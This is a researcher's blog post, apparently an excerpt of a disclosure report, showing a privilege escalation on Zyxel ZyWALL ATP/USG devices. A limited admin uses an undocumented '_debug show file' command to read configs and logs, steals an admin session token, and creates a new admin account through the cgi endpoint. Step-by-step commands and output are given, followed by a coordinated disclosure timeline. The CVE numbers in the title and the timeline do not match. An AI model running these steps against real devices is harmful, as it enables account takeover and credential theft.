rainpwn.blog
    Back to Blog
    ZYXEL
    Privilege Escalation
    CVE-2024-12398
    Multiple versions

    CVE-2024-12398: Privilege Escalation in ZYXEL Access Point

    February 20, 2025
    2 min read
    CVE-2024-12398: Privilege Escalation in ZYXEL Access Point

    "Two things are infinite: the universe and human stupidity,
    but Iā€™m not sure about the universe."
    ā€“ Albert Einstein

    šŸ“Œ Note

    This is an excerpt from the official writeup sent to ZYXEL,
    which does not include CVE-2023-37926.

    Summary

    During my audit, I noticed that a user with a "limited-admin" account, by logging in via SSH or Web Console in ZYXEL ZyWALL ATP/USG device, could access sensitive system files and extract data such as passwords, emails, and user access tokens, or even compromise the system casuing a denial of service.

    Access to the Device as a Limited User

    CVE-2024-12398: Privilege Escalation in ZYXEL Access Point
    rainpwn@0xdeadc0de:~$ ssh 192.168.1.1 -l limited
Password:
Router> # Hello ZySH!

    Limited Admin Attempting to Dump Admin Account Info

    Attempting to dump admin account info, sensitive data will be masked.

    CVE-2024-12398: Privilege Escalation in ZYXEL Access Point
    Router> show username admin
username : admin
password : ****
description : Administration account
email 1 : xxxx@xxxx.xxx.xx
mail1-verify : ****
email 2 : xxxx@xxxx.xxx.xx
mail2-verify : ****
mobile : ****
phone-verify : ****
google-verify : N/A
twoFA-auth-method : default(google-auth)
user type : admin
time setting : manual
lease time : 30
re-auth time : 0
password date : 2023/07/04
create date : Built-in
reference count : 0
Router>

    Limited Admin Attempting to Access Configuration File

    CVE-2024-12398: Privilege Escalation in ZYXEL Access Point
    Router> show running-config
Retval = -3041
ERROR: Insufficent privilege.
Router> copy running-config /conf/temp.conf
Retval = -3401
ERROR: Insufficent privilege.
Router>

    ZYSH Debug command

    The ZYSH shell has multiple debug commands, many of which are restricted to a debug account or, at least, the most important ones. However, there is an unindexed command called _debug. This command allows the execution of subcommands like show file, which returns a list of files that can be viewed without restrictions. By running _debug show file [file], it is possible to access its contents. Many sensitive files are accessible, but for this scenario, i will highlight two examples:

    Example Output:

    CVE-2024-12398: Privilege Escalation in ZYXEL Access Point
    Router# _debug show file
*** OTHER FILES HERE 
/db/etc/zyxel/ftp/conf/startup-config.conf
*** OTHER FILES HERE 
/var/log/error_log
*** OTHER FILES HERE
Router#

    Viewing the Device Configuration

    CVE-2024-12398: Privilege Escalation in ZYXEL Access Point
    Router> _debug show file /db/etc/zyxel/ftp/conf/startup-config.conf
! saved at 2023-07-04 14:44:25
! model: ATP700
! firmware version: 5.36(ABTJ.2)
!
language English
!
hardware-watchdog-timer start
[..] etc etc

    Token Impersonation

    By executing _debug show file /var/log/error_log, we can obtain a list of authentication logs, including tokens:

    CVE-2024-12398: Privilege Escalation in ZYXEL Access Point
    [Tue Jul 04 18:10:49.201590 2023] [:error] [pid 11465] [client ***:21279] Users: 
admin:http/https (****) (0Z73d1trMF88CvdEztubbXhX8+sRzrjZqbeYctTZoxgXYIXOAKz6cyWH
4+0trWbO:0Z73d1trMF88CvdEztubbXhX8+sRzrjZqbeYctTZoxgXYIXOAKz6cyWH4+0trWbO) is valid
and grant access, referer: https://REDACTED/ext-js/index.html

    Using this token, it is possible to send POST requests to https://REDACTED:PORT/cgi-bin/zysh-cgi to execute commands as an impersonated admin.

    Using a non-valid auth-token, web server reply us with a 302 status code.

    CVE-2024-12398: Privilege Escalation in ZYXEL Access Point
    rainpwn@0xdeadc0de:~$ ./zysh.sh "FAKETOKEN" "show users current;"
    CVE-2024-12398: Privilege Escalation in ZYXEL Access Point
    <!DOCTYPE HTML PUBLIC "-//IETF //DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
<herad><body>
<h1>Found</h1>
<p>The document has moved <a href="/">here</a>.</p>
</body></html>

    Using a valid one it will print us the command output.

    CVE-2024-12398: Privilege Escalation in ZYXEL Access Point
    rainpwn@0xdeadc0de:~$ ./zysh.sh "0Z73dM[...]0trWbO" "show users current;"
No: 1
  Name: admin
  Type: admin
  From: REDACTED
  Country_Code: IT
  Country_Name: Italy
  [...]
  Login_Time: 00:01:06
  [...]
  Unique: 0Z73d1tr8[...]+0trWbO

rainpwn@0xdeadc0de:~$

    Creating an Admin Account and Gaining Access

    CVE-2024-12398: Privilege Escalation in ZYXEL Access Point
    rainpwn@0xdeadc0de:~$ ./zysh.sh "0[..]bO" "username rain password 1234 user-type admin"
var zyshdata0=[];
var errno0=0;
var errmsg0='OK';
rainpwn@0xdeadc0de:~$

    Logging in via SSH with the "Hacked" Account

    CVE-2024-12398: Privilege Escalation in ZYXEL Access Point
    rainpwn@0xdeadc0de:~$ ssh 192.168.1.1 -l rain
Password:
Router# # We got our admin Account!!

    Disclosure

    • 2023-07-05: ZYXEL was notified via <security@zyxel.com.tw>
    • 2023-07-06: ZYXEL acknowledged my vulnerability report.
    • 2023-07-19: ZYXEL assigned CVE-2023-37925 and CVE-2023-37926 to the reported issues and informed me of their intention to publish their security advisory on 2023-11-28.
    • 2023-11-28: ZYXEL published their security advisory, following our coordinated disclosure timeline.
    Back to All Articles